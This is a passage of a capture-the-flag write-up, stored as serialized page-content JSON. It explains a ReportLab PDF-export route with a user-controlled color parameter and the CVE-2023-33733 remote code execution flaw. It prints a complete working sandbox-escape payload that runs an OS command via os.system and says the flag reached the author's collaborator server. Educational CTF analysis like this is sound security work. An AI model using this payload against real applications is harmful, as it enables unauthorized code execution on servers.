response",{"type":32,"tag":78,"props":4787,"children":4788},{"style":471},[4789],{"type":37,"value":495},{"type":32,"tag":78,"props":4791,"children":4792},{"style":498},[4793],{"type":37,"value":501},{"type":32,"tag":78,"props":4795,"children":4796},{"style":504},[4797],{"type":37,"value":4798},"No color",{"type":32,"tag":78,"props":4800,"children":4801},{"style":498},[4802],{"type":37,"value":501},{"type":32,"tag":78,"props":4804,"children":4805},{"style":471},[4806],{"type":37,"value":915},{"type":32,"tag":78,"props":4808,"children":4809},{"style":918},[4810],{"type":37,"value":4811}," 400\n",{"type":32,"tag":78,"props":4813,"children":4814},{"class":80,"line":144},[4815],{"type":32,"tag":78,"props":4816,"children":4817},{"emptyLinePlaceholder":157},[4818],{"type":37,"value":160},{"type":32,"tag":78,"props":4820,"children":4821},{"class":80,"line":153},[4822,4827,4831,4836],{"type":32,"tag":78,"props":4823,"children":4824},{"style":607},[4825],{"type":37,"value":4826},"  db_session ",{"type":32,"tag":78,"props":4828,"children":4829},{"style":471},[4830],{"type":37,"value":624},{"type":32,"tag":78,"props":4832,"children":4833},{"style":607},[4834],{"type":37,"value":4835}," Database",{"type":32,"tag":78,"props":4837,"children":4838},{"style":471},[4839],{"type":37,"value":1170},{"type":32,"tag":78,"props":4841,"children":4842},{"class":80,"line":163},[4843,4848,4852,4856,4860,4865],{"type":32,"tag":78,"props":4844,"children":4845},{"style":607},[4846],{"type":37,"value":4847},"  orders 
",{"type":32,"tag":78,"props":4849,"children":4850},{"style":471},[4851],{"type":37,"value":624},{"type":32,"tag":78,"props":4853,"children":4854},{"style":607},[4855],{"type":37,"value":629},{"type":32,"tag":78,"props":4857,"children":4858},{"style":471},[4859],{"type":37,"value":485},{"type":32,"tag":78,"props":4861,"children":4862},{"style":607},[4863],{"type":37,"value":4864},"get_all_orders",{"type":32,"tag":78,"props":4866,"children":4867},{"style":471},[4868],{"type":37,"value":1170},{"type":32,"tag":78,"props":4870,"children":4871},{"class":80,"line":172},[4872],{"type":32,"tag":78,"props":4873,"children":4874},{"style":607},[4875],{"type":37,"value":827},{"type":32,"tag":78,"props":4877,"children":4878},{"class":80,"line":181},[4879,4883,4887,4892],{"type":32,"tag":78,"props":4880,"children":4881},{"style":833},[4882],{"type":37,"value":4759},{"type":32,"tag":78,"props":4884,"children":4885},{"style":569},[4886],{"type":37,"value":4764},{"type":32,"tag":78,"props":4888,"children":4889},{"style":607},[4890],{"type":37,"value":4891}," orders",{"type":32,"tag":78,"props":4893,"children":4894},{"style":471},[4895],{"type":37,"value":1545},{"type":32,"tag":78,"props":4897,"children":4898},{"class":80,"line":190},[4899,4903,4907,4911,4915,4920,4924,4928],{"type":32,"tag":78,"props":4900,"children":4901},{"style":833},[4902],{"type":37,"value":1178},{"type":32,"tag":78,"props":4904,"children":4905},{"style":607},[4906],{"type":37,"value":4785},{"type":32,"tag":78,"props":4908,"children":4909},{"style":471},[4910],{"type":37,"value":495},{"type":32,"tag":78,"props":4912,"children":4913},{"style":498},[4914],{"type":37,"value":501},{"type":32,"tag":78,"props":4916,"children":4917},{"style":504},[4918],{"type":37,"value":4919},"No orders 
placed",{"type":32,"tag":78,"props":4921,"children":4922},{"style":498},[4923],{"type":37,"value":501},{"type":32,"tag":78,"props":4925,"children":4926},{"style":471},[4927],{"type":37,"value":915},{"type":32,"tag":78,"props":4929,"children":4930},{"style":918},[4931],{"type":37,"value":921},{"type":32,"tag":78,"props":4933,"children":4934},{"class":80,"line":199},[4935],{"type":32,"tag":78,"props":4936,"children":4937},{"emptyLinePlaceholder":157},[4938],{"type":37,"value":160},{"type":32,"tag":78,"props":4940,"children":4941},{"class":80,"line":207},[4942,4947,4951,4955,4959,4963,4968,4972,4976,4980,4984,4988],{"type":32,"tag":78,"props":4943,"children":4944},{"style":607},[4945],{"type":37,"value":4946},"  orders_template ",{"type":32,"tag":78,"props":4948,"children":4949},{"style":471},[4950],{"type":37,"value":624},{"type":32,"tag":78,"props":4952,"children":4953},{"style":607},[4954],{"type":37,"value":841},{"type":32,"tag":78,"props":4956,"children":4957},{"style":471},[4958],{"type":37,"value":495},{"type":32,"tag":78,"props":4960,"children":4961},{"style":498},[4962],{"type":37,"value":501},{"type":32,"tag":78,"props":4964,"children":4965},{"style":504},[4966],{"type":37,"value":4967},"orders.html",{"type":32,"tag":78,"props":4969,"children":4970},{"style":498},[4971],{"type":37,"value":501},{"type":32,"tag":78,"props":4973,"children":4974},{"style":471},[4975],{"type":37,"value":516},{"type":32,"tag":78,"props":4977,"children":4978},{"style":519},[4979],{"type":37,"value":4769},{"type":32,"tag":78,"props":4981,"children":4982},{"style":471},[4983],{"type":37,"value":624},{"type":32,"tag":78,"props":4985,"children":4986},{"style":607},[4987],{"type":37,"value":4736},{"type":32,"tag":78,"props":4989,"children":4990},{"style":471},[4991],{"type":37,"value":722},{"type":32,"tag":78,"props":4993,"children":4994},{"class":80,"line":215},[4995],{"type":32,"tag":78,"props":4996,"children":4997},{"style":607},[4998],{"type":37,"value":827},{"type":32,"tag":78,"prop
s":5000,"children":5001},{"class":80,"line":224},[5002,5007,5011,5016],{"type":32,"tag":78,"props":5003,"children":5004},{"style":607},[5005],{"type":37,"value":5006},"  html2pdf ",{"type":32,"tag":78,"props":5008,"children":5009},{"style":471},[5010],{"type":37,"value":624},{"type":32,"tag":78,"props":5012,"children":5013},{"style":607},[5014],{"type":37,"value":5015}," HTML2PDF",{"type":32,"tag":78,"props":5017,"children":5018},{"style":471},[5019],{"type":37,"value":1170},{"type":32,"tag":78,"props":5021,"children":5022},{"class":80,"line":233},[5023,5028,5032,5037,5041,5046,5050,5055,5059,5063],{"type":32,"tag":78,"props":5024,"children":5025},{"style":607},[5026],{"type":37,"value":5027},"  pdf ",{"type":32,"tag":78,"props":5029,"children":5030},{"style":471},[5031],{"type":37,"value":624},{"type":32,"tag":78,"props":5033,"children":5034},{"style":607},[5035],{"type":37,"value":5036}," html2pdf",{"type":32,"tag":78,"props":5038,"children":5039},{"style":471},[5040],{"type":37,"value":485},{"type":32,"tag":78,"props":5042,"children":5043},{"style":607},[5044],{"type":37,"value":5045},"convert",{"type":32,"tag":78,"props":5047,"children":5048},{"style":471},[5049],{"type":37,"value":495},{"type":32,"tag":78,"props":5051,"children":5052},{"style":607},[5053],{"type":37,"value":5054},"orders_template",{"type":32,"tag":78,"props":5056,"children":5057},{"style":471},[5058],{"type":37,"value":516},{"type":32,"tag":78,"props":5060,"children":5061},{"style":607},[5062],{"type":37,"value":4891},{"type":32,"tag":78,"props":5064,"children":5065},{"style":471},[5066],{"type":37,"value":722},{"type":32,"tag":78,"props":5068,"children":5069},{"class":80,"line":241},[5070],{"type":32,"tag":78,"props":5071,"children":5072},{"style":607},[5073],{"type":37,"value":827},{"type":32,"tag":78,"props":5075,"children":5076},{"class":80,"line":250},[5077,5082,5086,5091,5095,5100],{"type":32,"tag":78,"props":5078,"children":5079},{"style":607},[5080],{"type":37,"value":5081},"  
pdf",{"type":32,"tag":78,"props":5083,"children":5084},{"style":471},[5085],{"type":37,"value":485},{"type":32,"tag":78,"props":5087,"children":5088},{"style":607},[5089],{"type":37,"value":5090},"seek",{"type":32,"tag":78,"props":5092,"children":5093},{"style":471},[5094],{"type":37,"value":495},{"type":32,"tag":78,"props":5096,"children":5097},{"style":918},[5098],{"type":37,"value":5099},"0",{"type":32,"tag":78,"props":5101,"children":5102},{"style":471},[5103],{"type":37,"value":722},{"type":32,"tag":78,"props":5105,"children":5106},{"class":80,"line":3011},[5107,5111,5116,5120,5125,5129,5134,5138,5142,5146,5151,5155,5159,5164,5168,5172,5177,5181,5185,5190,5194],{"type":32,"tag":78,"props":5108,"children":5109},{"style":833},[5110],{"type":37,"value":836},{"type":32,"tag":78,"props":5112,"children":5113},{"style":607},[5114],{"type":37,"value":5115}," send_file",{"type":32,"tag":78,"props":5117,"children":5118},{"style":471},[5119],{"type":37,"value":495},{"type":32,"tag":78,"props":5121,"children":5122},{"style":607},[5123],{"type":37,"value":5124},"pdf",{"type":32,"tag":78,"props":5126,"children":5127},{"style":471},[5128],{"type":37,"value":516},{"type":32,"tag":78,"props":5130,"children":5131},{"style":519},[5132],{"type":37,"value":5133}," as_attachment",{"type":32,"tag":78,"props":5135,"children":5136},{"style":471},[5137],{"type":37,"value":624},{"type":32,"tag":78,"props":5139,"children":5140},{"style":833},[5141],{"type":37,"value":1297},{"type":32,"tag":78,"props":5143,"children":5144},{"style":471},[5145],{"type":37,"value":516},{"type":32,"tag":78,"props":5147,"children":5148},{"style":519},[5149],{"type":37,"value":5150}," 
download_name",{"type":32,"tag":78,"props":5152,"children":5153},{"style":471},[5154],{"type":37,"value":624},{"type":32,"tag":78,"props":5156,"children":5157},{"style":498},[5158],{"type":37,"value":501},{"type":32,"tag":78,"props":5160,"children":5161},{"style":504},[5162],{"type":37,"value":5163},"orders.pdf",{"type":32,"tag":78,"props":5165,"children":5166},{"style":498},[5167],{"type":37,"value":501},{"type":32,"tag":78,"props":5169,"children":5170},{"style":471},[5171],{"type":37,"value":516},{"type":32,"tag":78,"props":5173,"children":5174},{"style":519},[5175],{"type":37,"value":5176}," mimetype",{"type":32,"tag":78,"props":5178,"children":5179},{"style":471},[5180],{"type":37,"value":624},{"type":32,"tag":78,"props":5182,"children":5183},{"style":498},[5184],{"type":37,"value":501},{"type":32,"tag":78,"props":5186,"children":5187},{"style":504},[5188],{"type":37,"value":5189},"application/pdf",{"type":32,"tag":78,"props":5191,"children":5192},{"style":498},[5193],{"type":37,"value":501},{"type":32,"tag":78,"props":5195,"children":5196},{"style":471},[5197],{"type":37,"value":722},{"type":32,"tag":46,"props":5199,"children":5200},{},[5201,5203,5208,5210,5216],{"type":37,"value":5202},"This route is responsible for generating a PDF document of all orders, with a specified color, and sending it as a downloadable file in the response to a POST request at the ",{"type":32,"tag":74,"props":5204,"children":5206},{"className":5205},[],[5207],{"type":37,"value":4625},{"type":37,"value":5209}," route. 
It uses the ",{"type":32,"tag":74,"props":5211,"children":5213},{"className":5212},[],[5214],{"type":37,"value":5215},"render_template",{"type":37,"value":5217}," function to render the orders.html template, which is then converted to a PDF using the HTML2PDF class.",{"type":32,"tag":46,"props":5219,"children":5220},{},[5221,5223,5228],{"type":37,"value":5222},"You can find below the ",{"type":32,"tag":74,"props":5224,"children":5226},{"className":5225},[],[5227],{"type":37,"value":4967},{"type":37,"value":5229}," template:",{"type":32,"tag":63,"props":5231,"children":5232},{"lang":3279},[5233],{"type":32,"tag":68,"props":5234,"children":5236},{"className":3283,"code":5235,"language":3279,"meta":7,"style":7},"\u003C!-- orders.html  -->\n\u003Cpara>\n    \u003Cfont color=\"{{ color }}\">\n        Orders:\n    \u003C/font>\n\u003C/para>\n",[5237],{"type":32,"tag":74,"props":5238,"children":5239},{"__ignoreMap":7},[5240,5248,5265,5304,5312,5328],{"type":32,"tag":78,"props":5241,"children":5242},{"class":80,"line":81},[5243],{"type":32,"tag":78,"props":5244,"children":5245},{"style":673},[5246],{"type":37,"value":5247},"\u003C!-- orders.html  -->\n",{"type":32,"tag":78,"props":5249,"children":5250},{"class":80,"line":90},[5251,5255,5261],{"type":32,"tag":78,"props":5252,"children":5253},{"style":471},[5254],{"type":37,"value":3296},{"type":32,"tag":78,"props":5256,"children":5258},{"style":5257},"--shiki-default:#FDAEB7",[5259],{"type":37,"value":5260},"para",{"type":32,"tag":78,"props":5262,"children":5263},{"style":471},[5264],{"type":37,"value":3371},{"type":32,"tag":78,"props":5266,"children":5267},{"class":80,"line":99},[5268,5273,5279,5283,5287,5291,5296,5300],{"type":32,"tag":78,"props":5269,"children":5270},{"style":471},[5271],{"type":37,"value":5272},"    
\u003C",{"type":32,"tag":78,"props":5274,"children":5276},{"style":5275},"--shiki-default:#FDAEB7;--shiki-default-font-style:italic",[5277],{"type":37,"value":5278},"font",{"type":32,"tag":78,"props":5280,"children":5281},{"style":519},[5282],{"type":37,"value":4769},{"type":32,"tag":78,"props":5284,"children":5285},{"style":471},[5286],{"type":37,"value":624},{"type":32,"tag":78,"props":5288,"children":5289},{"style":498},[5290],{"type":37,"value":501},{"type":32,"tag":78,"props":5292,"children":5293},{"style":504},[5294],{"type":37,"value":5295},"{{ color }}",{"type":32,"tag":78,"props":5297,"children":5298},{"style":498},[5299],{"type":37,"value":501},{"type":32,"tag":78,"props":5301,"children":5302},{"style":471},[5303],{"type":37,"value":3371},{"type":32,"tag":78,"props":5305,"children":5306},{"class":80,"line":108},[5307],{"type":32,"tag":78,"props":5308,"children":5309},{"style":607},[5310],{"type":37,"value":5311},"        Orders:\n",{"type":32,"tag":78,"props":5313,"children":5314},{"class":80,"line":117},[5315,5320,5324],{"type":32,"tag":78,"props":5316,"children":5317},{"style":471},[5318],{"type":37,"value":5319},"    \u003C/",{"type":32,"tag":78,"props":5321,"children":5322},{"style":5275},[5323],{"type":37,"value":5278},{"type":32,"tag":78,"props":5325,"children":5326},{"style":471},[5327],{"type":37,"value":3371},{"type":32,"tag":78,"props":5329,"children":5330},{"class":80,"line":126},[5331,5336,5340],{"type":32,"tag":78,"props":5332,"children":5333},{"style":471},[5334],{"type":37,"value":5335},"\u003C/",{"type":32,"tag":78,"props":5337,"children":5338},{"style":5257},[5339],{"type":37,"value":5260},{"type":32,"tag":78,"props":5341,"children":5342},{"style":471},[5343],{"type":37,"value":3371},{"type":32,"tag":46,"props":5345,"children":5346},{},[5347],{"type":37,"value":5348},"The class HTML2PDF is responsible for converting the HTML template to a PDF document. 
It uses the reportlab library to do this.",{"type":32,"tag":46,"props":5350,"children":5351},{},[5352],{"type":37,"value":5353},"Reportlab is an open-source project that allows generating PDF documents using the Python programming language. It supports the creation of graphics and data charts from various bitmap and vector formats, in addition to PDF.",{"type":32,"tag":63,"props":5355,"children":5356},{"lang":456},[5357],{"type":32,"tag":68,"props":5358,"children":5360},{"className":460,"code":5359,"language":456,"meta":7,"style":7},"from reportlab.platypus import SimpleDocTemplate, Paragraph, Table, TableStyle\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.lib import colors\nfrom io import BytesIO\n\nclass HTML2PDF():\n    def __init__(self):\n        self.stream_file = BytesIO()\n        self.content = []\n\n[...]\n\n    def convert(self, html, data):\n        doc = self.get_document_template(self.stream_file)\n        self.add_paragraph(html)\n        self.add_table(data)\n        self.build_document(doc, self.content)\n        return self.stream_file\n",[5361],{"type":32,"tag":74,"props":5362,"children":5363},{"__ignoreMap":7},[5364,5422,5460,5489,5510,5517,5532,5555,5585,5610,5617,5632,5639,5681,5727,5755,5784,5830],{"type":32,"tag":78,"props":5365,"children":5366},{"class":80,"line":81},[5367,5372,5377,5381,5386,5390,5395,5399,5404,5408,5413,5417],{"type":32,"tag":78,"props":5368,"children":5369},{"style":833},[5370],{"type":37,"value":5371},"from",{"type":32,"tag":78,"props":5373,"children":5374},{"style":607},[5375],{"type":37,"value":5376}," reportlab",{"type":32,"tag":78,"props":5378,"children":5379},{"style":471},[5380],{"type":37,"value":485},{"type":32,"tag":78,"props":5382,"children":5383},{"style":607},[5384],{"type":37,"value":5385},"platypus ",{"type":32,"tag":78,"props":5387,"children":5388},{"style":833},[5389],{"type":37,"value":1947},{"type":32,"tag":78,"props":5391,"children":5392},{"style":607},[5393],{"type":37,"value":5394}," 
SimpleDocTemplate",{"type":32,"tag":78,"props":5396,"children":5397},{"style":471},[5398],{"type":37,"value":516},{"type":32,"tag":78,"props":5400,"children":5401},{"style":607},[5402],{"type":37,"value":5403}," Paragraph",{"type":32,"tag":78,"props":5405,"children":5406},{"style":471},[5407],{"type":37,"value":516},{"type":32,"tag":78,"props":5409,"children":5410},{"style":607},[5411],{"type":37,"value":5412}," Table",{"type":32,"tag":78,"props":5414,"children":5415},{"style":471},[5416],{"type":37,"value":516},{"type":32,"tag":78,"props":5418,"children":5419},{"style":607},[5420],{"type":37,"value":5421}," TableStyle\n",{"type":32,"tag":78,"props":5423,"children":5424},{"class":80,"line":90},[5425,5429,5433,5437,5442,5446,5451,5455],{"type":32,"tag":78,"props":5426,"children":5427},{"style":833},[5428],{"type":37,"value":5371},{"type":32,"tag":78,"props":5430,"children":5431},{"style":607},[5432],{"type":37,"value":5376},{"type":32,"tag":78,"props":5434,"children":5435},{"style":471},[5436],{"type":37,"value":485},{"type":32,"tag":78,"props":5438,"children":5439},{"style":607},[5440],{"type":37,"value":5441},"lib",{"type":32,"tag":78,"props":5443,"children":5444},{"style":471},[5445],{"type":37,"value":485},{"type":32,"tag":78,"props":5447,"children":5448},{"style":607},[5449],{"type":37,"value":5450},"pagesizes ",{"type":32,"tag":78,"props":5452,"children":5453},{"style":833},[5454],{"type":37,"value":1947},{"type":32,"tag":78,"props":5456,"children":5457},{"style":607},[5458],{"type":37,"value":5459}," 
letter\n",{"type":32,"tag":78,"props":5461,"children":5462},{"class":80,"line":99},[5463,5467,5471,5475,5480,5484],{"type":32,"tag":78,"props":5464,"children":5465},{"style":833},[5466],{"type":37,"value":5371},{"type":32,"tag":78,"props":5468,"children":5469},{"style":607},[5470],{"type":37,"value":5376},{"type":32,"tag":78,"props":5472,"children":5473},{"style":471},[5474],{"type":37,"value":485},{"type":32,"tag":78,"props":5476,"children":5477},{"style":607},[5478],{"type":37,"value":5479},"lib ",{"type":32,"tag":78,"props":5481,"children":5482},{"style":833},[5483],{"type":37,"value":1947},{"type":32,"tag":78,"props":5485,"children":5486},{"style":607},[5487],{"type":37,"value":5488}," colors\n",{"type":32,"tag":78,"props":5490,"children":5491},{"class":80,"line":108},[5492,5496,5501,5505],{"type":32,"tag":78,"props":5493,"children":5494},{"style":833},[5495],{"type":37,"value":5371},{"type":32,"tag":78,"props":5497,"children":5498},{"style":607},[5499],{"type":37,"value":5500}," io ",{"type":32,"tag":78,"props":5502,"children":5503},{"style":833},[5504],{"type":37,"value":1947},{"type":32,"tag":78,"props":5506,"children":5507},{"style":607},[5508],{"type":37,"value":5509}," 
BytesIO\n",{"type":32,"tag":78,"props":5511,"children":5512},{"class":80,"line":117},[5513],{"type":32,"tag":78,"props":5514,"children":5515},{"emptyLinePlaceholder":157},[5516],{"type":37,"value":160},{"type":32,"tag":78,"props":5518,"children":5519},{"class":80,"line":126},[5520,5524,5528],{"type":32,"tag":78,"props":5521,"children":5522},{"style":569},[5523],{"type":37,"value":1206},{"type":32,"tag":78,"props":5525,"children":5526},{"style":1209},[5527],{"type":37,"value":5015},{"type":32,"tag":78,"props":5529,"children":5530},{"style":471},[5531],{"type":37,"value":582},{"type":32,"tag":78,"props":5533,"children":5534},{"class":80,"line":135},[5535,5539,5543,5547,5551],{"type":32,"tag":78,"props":5536,"children":5537},{"style":569},[5538],{"type":37,"value":1553},{"type":32,"tag":78,"props":5540,"children":5541},{"style":1257},[5542],{"type":37,"value":1558},{"type":32,"tag":78,"props":5544,"children":5545},{"style":471},[5546],{"type":37,"value":495},{"type":32,"tag":78,"props":5548,"children":5549},{"style":607},[5550],{"type":37,"value":952},{"type":32,"tag":78,"props":5552,"children":5553},{"style":471},[5554],{"type":37,"value":966},{"type":32,"tag":78,"props":5556,"children":5557},{"class":80,"line":144},[5558,5563,5567,5572,5576,5581],{"type":32,"tag":78,"props":5559,"children":5560},{"style":593},[5561],{"type":37,"value":5562},"        self",{"type":32,"tag":78,"props":5564,"children":5565},{"style":471},[5566],{"type":37,"value":485},{"type":32,"tag":78,"props":5568,"children":5569},{"style":607},[5570],{"type":37,"value":5571},"stream_file ",{"type":32,"tag":78,"props":5573,"children":5574},{"style":471},[5575],{"type":37,"value":624},{"type":32,"tag":78,"props":5577,"children":5578},{"style":607},[5579],{"type":37,"value":5580}," 
BytesIO",{"type":32,"tag":78,"props":5582,"children":5583},{"style":471},[5584],{"type":37,"value":1170},{"type":32,"tag":78,"props":5586,"children":5587},{"class":80,"line":153},[5588,5592,5596,5601,5605],{"type":32,"tag":78,"props":5589,"children":5590},{"style":593},[5591],{"type":37,"value":5562},{"type":32,"tag":78,"props":5593,"children":5594},{"style":471},[5595],{"type":37,"value":485},{"type":32,"tag":78,"props":5597,"children":5598},{"style":607},[5599],{"type":37,"value":5600},"content ",{"type":32,"tag":78,"props":5602,"children":5603},{"style":471},[5604],{"type":37,"value":624},{"type":32,"tag":78,"props":5606,"children":5607},{"style":471},[5608],{"type":37,"value":5609}," []\n",{"type":32,"tag":78,"props":5611,"children":5612},{"class":80,"line":163},[5613],{"type":32,"tag":78,"props":5614,"children":5615},{"emptyLinePlaceholder":157},[5616],{"type":37,"value":160},{"type":32,"tag":78,"props":5618,"children":5619},{"class":80,"line":172},[5620,5624,5628],{"type":32,"tag":78,"props":5621,"children":5622},{"style":471},[5623],{"type":37,"value":1626},{"type":32,"tag":78,"props":5625,"children":5626},{"style":593},[5627],{"type":37,"value":596},{"type":32,"tag":78,"props":5629,"children":5630},{"style":471},[5631],{"type":37,"value":601},{"type":32,"tag":78,"props":5633,"children":5634},{"class":80,"line":181},[5635],{"type":32,"tag":78,"props":5636,"children":5637},{"emptyLinePlaceholder":157},[5638],{"type":37,"value":160},{"type":32,"tag":78,"props":5640,"children":5641},{"class":80,"line":190},[5642,5646,5651,5655,5659,5663,5668,5672,5677],{"type":32,"tag":78,"props":5643,"children":5644},{"style":569},[5645],{"type":37,"value":1553},{"type":32,"tag":78,"props":5647,"children":5648},{"style":477},[5649],{"type":37,"value":5650}," 
convert",{"type":32,"tag":78,"props":5652,"children":5653},{"style":471},[5654],{"type":37,"value":495},{"type":32,"tag":78,"props":5656,"children":5657},{"style":607},[5658],{"type":37,"value":952},{"type":32,"tag":78,"props":5660,"children":5661},{"style":471},[5662],{"type":37,"value":516},{"type":32,"tag":78,"props":5664,"children":5665},{"style":607},[5666],{"type":37,"value":5667}," html",{"type":32,"tag":78,"props":5669,"children":5670},{"style":471},[5671],{"type":37,"value":516},{"type":32,"tag":78,"props":5673,"children":5674},{"style":607},[5675],{"type":37,"value":5676}," data",{"type":32,"tag":78,"props":5678,"children":5679},{"style":471},[5680],{"type":37,"value":966},{"type":32,"tag":78,"props":5682,"children":5683},{"class":80,"line":199},[5684,5689,5693,5697,5701,5706,5710,5714,5718,5723],{"type":32,"tag":78,"props":5685,"children":5686},{"style":607},[5687],{"type":37,"value":5688},"        doc ",{"type":32,"tag":78,"props":5690,"children":5691},{"style":471},[5692],{"type":37,"value":624},{"type":32,"tag":78,"props":5694,"children":5695},{"style":593},[5696],{"type":37,"value":1596},{"type":32,"tag":78,"props":5698,"children":5699},{"style":471},[5700],{"type":37,"value":485},{"type":32,"tag":78,"props":5702,"children":5703},{"style":607},[5704],{"type":37,"value":5705},"get_document_template",{"type":32,"tag":78,"props":5707,"children":5708},{"style":471},[5709],{"type":37,"value":495},{"type":32,"tag":78,"props":5711,"children":5712},{"style":593},[5713],{"type":37,"value":952},{"type":32,"tag":78,"props":5715,"children":5716},{"style":471},[5717],{"type":37,"value":485},{"type":32,"tag":78,"props":5719,"children":5720},{"style":607},[5721],{"type":37,"value":5722},"stream_file",{"type":32,"tag":78,"props":5724,"children":5725},{"style":471},[5726],{"type":37,"value":722},{"type":32,"tag":78,"props":5728,"children":5729},{"class":80,"line":207},[5730,5734,5738,5743,5747,5751],{"type":32,"tag":78,"props":5731,"children":5732},{"style":593},[5733
],{"type":37,"value":5562},{"type":32,"tag":78,"props":5735,"children":5736},{"style":471},[5737],{"type":37,"value":485},{"type":32,"tag":78,"props":5739,"children":5740},{"style":607},[5741],{"type":37,"value":5742},"add_paragraph",{"type":32,"tag":78,"props":5744,"children":5745},{"style":471},[5746],{"type":37,"value":495},{"type":32,"tag":78,"props":5748,"children":5749},{"style":607},[5750],{"type":37,"value":3279},{"type":32,"tag":78,"props":5752,"children":5753},{"style":471},[5754],{"type":37,"value":722},{"type":32,"tag":78,"props":5756,"children":5757},{"class":80,"line":215},[5758,5762,5766,5771,5775,5780],{"type":32,"tag":78,"props":5759,"children":5760},{"style":593},[5761],{"type":37,"value":5562},{"type":32,"tag":78,"props":5763,"children":5764},{"style":471},[5765],{"type":37,"value":485},{"type":32,"tag":78,"props":5767,"children":5768},{"style":607},[5769],{"type":37,"value":5770},"add_table",{"type":32,"tag":78,"props":5772,"children":5773},{"style":471},[5774],{"type":37,"value":495},{"type":32,"tag":78,"props":5776,"children":5777},{"style":607},[5778],{"type":37,"value":5779},"data",{"type":32,"tag":78,"props":5781,"children":5782},{"style":471},[5783],{"type":37,"value":722},{"type":32,"tag":78,"props":5785,"children":5786},{"class":80,"line":224},[5787,5791,5795,5800,5804,5809,5813,5817,5821,5826],{"type":32,"tag":78,"props":5788,"children":5789},{"style":593},[5790],{"type":37,"value":5562},{"type":32,"tag":78,"props":5792,"children":5793},{"style":471},[5794],{"type":37,"value":485},{"type":32,"tag":78,"props":5796,"children":5797},{"style":607},[5798],{"type":37,"value":5799},"build_document",{"type":32,"tag":78,"props":5801,"children":5802},{"style":471},[5803],{"type":37,"value":495},{"type":32,"tag":78,"props":5805,"children":5806},{"style":607},[5807],{"type":37,"value":5808},"doc",{"type":32,"tag":78,"props":5810,"children":5811},{"style":471},[5812],{"type":37,"value":516},{"type":32,"tag":78,"props":5814,"children":5815},{"style":5
93},[5816],{"type":37,"value":1596},{"type":32,"tag":78,"props":5818,"children":5819},{"style":471},[5820],{"type":37,"value":485},{"type":32,"tag":78,"props":5822,"children":5823},{"style":607},[5824],{"type":37,"value":5825},"content",{"type":32,"tag":78,"props":5827,"children":5828},{"style":471},[5829],{"type":37,"value":722},{"type":32,"tag":78,"props":5831,"children":5832},{"class":80,"line":233},[5833,5838,5842,5846],{"type":32,"tag":78,"props":5834,"children":5835},{"style":833},[5836],{"type":37,"value":5837},"        return",{"type":32,"tag":78,"props":5839,"children":5840},{"style":593},[5841],{"type":37,"value":1596},{"type":32,"tag":78,"props":5843,"children":5844},{"style":471},[5845],{"type":37,"value":485},{"type":32,"tag":78,"props":5847,"children":5848},{"style":607},[5849],{"type":37,"value":5850},"stream_file\n",{"type":32,"tag":46,"props":5852,"children":5853},{},[5854,5856,5862],{"type":37,"value":5855},"This library is known to be vulnerable to RCE attacks. The vulnerability is present due to inadequate validations within the ",{"type":32,"tag":74,"props":5857,"children":5859},{"className":5858},[],[5860],{"type":37,"value":5861},"rl_safe_eval",{"type":37,"value":5863}," function, attackers have the ability to insert malicious code into an HTML document, which will then be converted into a PDF using software that relies on the ReportLab library. To exploit this vulnerability, the entire malicious code must be activated through eval within a single expression. 
This vulnerability is referenced as CVE-2023-33733.",{"type":32,"tag":46,"props":5865,"children":5866},{},[5867,5869,5876],{"type":37,"value":5868},"For more details, ",{"type":32,"tag":408,"props":5870,"children":5873},{":target":410,"href":5871,"rel":5872},"https://github.com/c53elyas/CVE-2023-33733",[413],[5874],{"type":37,"value":5875},"the article of c53elyas",{"type":37,"value":5877}," explains the vulnerability in depth.",{"type":32,"tag":46,"props":5879,"children":5880},{},[5881],{"type":32,"tag":3077,"props":5882,"children":5883},{},[5884],{"type":37,"value":5885},"It is important to note that this exploit is only possible if the application allow hostile input to be passed into colors. This is exactly our case, as we control the variable color that is used in the render_template function.",{"type":32,"tag":46,"props":5887,"children":5888},{},[5889],{"type":37,"value":5890},"The payload that will be executed to exploit the RCE during our final exploit is as follows:",{"type":32,"tag":63,"props":5892,"children":5894},{"lang":5893},"txt",[5895],{"type":32,"tag":68,"props":5896,"children":5899},{"className":5897,"code":5898,"language":5893,"meta":7,"style":7},"language-txt shiki shiki-themes vitesse-dark","[[[getattr(pow, Word('__globals__'))['os'].system('echo pwned') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated \u003C 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 
'red'\n",[5900],{"type":32,"tag":74,"props":5901,"children":5902},{"__ignoreMap":7},[5903],{"type":32,"tag":78,"props":5904,"children":5905},{"class":80,"line":81},[5906],{"type":32,"tag":78,"props":5907,"children":5908},{},[5909],{"type":37,"value":5898},{"type":32,"tag":46,"props":5911,"children":5912},{},[5913],{"type":37,"value":5914},"Here is the final request that will allow us to exploit the vulnerability:",{"type":32,"tag":52,"props":5916,"children":5918},{"imgSrc":5917},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704322788/writeups/phantom-feed/last_request.webp",[],{"type":32,"tag":46,"props":5920,"children":5921},{},[5922],{"type":37,"value":5923},"We can see the flag sent successfully to our collaborator:",{"type":32,"tag":52,"props":5925,"children":5927},{"imgSrc":5926},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704322779/writeups/phantom-feed/flag_collaborator.webp",[],{"type":32,"tag":5929,"props":5930,"children":5931},"style",{},[5932],{"type":37,"value":5933},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":90,"depth":81,"links":5935},[5936,5937,5938,5939,5940],{"id":41,"depth":90,"text":44},{"id":382,"depth":90,"text":385},{"id":2329,"depth":90,"text":2332},{"id":3037,"depth":90,"text":3040},{"id":4575,"depth":90,"text":4578},"markdown","content:writeups:phantom-feed.md","writeups/phantom-feed.md","writeups/phantom-feed","md",1749027224526]